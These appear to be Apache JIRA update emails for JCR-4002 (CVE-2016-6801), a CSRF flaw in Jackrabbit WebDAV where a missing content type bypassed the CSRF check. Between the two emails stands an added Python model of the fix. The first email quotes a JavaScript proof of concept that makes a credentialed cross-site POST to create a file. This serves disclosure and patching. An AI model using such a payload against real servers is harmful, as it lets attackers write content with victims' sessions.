[jira] [Updated] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
[ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Julian Reschke updated JCR-4002:
--------------------------------

    Fix Version/s: 2.14

> CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
> ------------------------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2, 2.14
>
>         Attachments: CVE-2016-6801.txt, JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request content type. This can be exploited to create a resource via CSRF like so:
> {code}
> function submitRequest()
> {
>     var xhr = new XMLHttpRequest();
>     xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>     xhr.withCredentials = true;
>     var body = "This file has been uploaded via CSRF.=\r\n";
>     var aBody = new Uint8Array(body.length);
>     for (var i = 0; i < aBody.length; i++)
>         aBody[i] = body.charCodeAt(i);
>     xhr.send(new Blob([aBody]));
> }
> {code}
> I will mitigate this particular issue by including a null content type in the list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319

--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
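The mitigation described in the issue above, modelled as an added example (not Jackrabbit's own code): a content-type gate for cross-site POSTs, with the pre-fix behaviour (a missing Content-Type is never on the reject list) beside the post-fix behaviour (missing or empty Content-Type is rejected like a form type). The reject list, function names and sample requests are assumptions for illustration; the real check in jackrabbit-webdav is not reproduced.

```python
from typing import Optional

# Assumed reject list: the media types a browser may send cross-origin in a
# plain POST without a CORS preflight, i.e. the ones a CSRF page can use.
FORM_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}


def _media_type(content_type: Optional[str]) -> Optional[str]:
    """Strip parameters such as '; charset=utf-8' and normalise case."""
    if content_type is None:
        return None
    return content_type.split(";", 1)[0].strip().lower()


def rejects_vulnerable(method: str, content_type: Optional[str]) -> bool:
    """Pre-fix logic: only the listed types are rejected, so a request whose
    Content-Type header is absent (what xhr.send(new Blob([...])) with an
    untyped Blob produces) is waved through."""
    if method.upper() != "POST":
        return False
    return _media_type(content_type) in FORM_CONTENT_TYPES


def rejects_fixed(method: str, content_type: Optional[str]) -> bool:
    """Post-fix logic: an absent or empty Content-Type counts as rejected."""
    if method.upper() != "POST":
        return False
    mt = _media_type(content_type)
    return mt is None or mt == "" or mt in FORM_CONTENT_TYPES


# Constructed sample requests: (method, Content-Type header as received).
SAMPLES = [
    ("PUT", "application/octet-stream"),            # normal WebDAV client
    ("POST", "application/x-www-form-urlencoded"),  # classic form CSRF
    ("POST", None),                                 # Blob PoC: header absent
    ("POST", "  "),                                 # header present but blank
]


def compare(samples=SAMPLES):
    """Return (method, content_type, vulnerable_rejects, fixed_rejects)."""
    return [(m, ct, rejects_vulnerable(m, ct), rejects_fixed(m, ct))
            for m, ct in samples]
```

Only the third and fourth samples differ between the two versions, which is exactly the gap JCR-4002 closes.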
[jira] [Updated] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
[ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Julian Reschke updated JCR-4002:
--------------------------------

    Summary: CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)  (was: CSRF in Jackrabbit-Webdav using empty content-type)

> CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
> ------------------------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: CVE-2016-6801.txt, JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch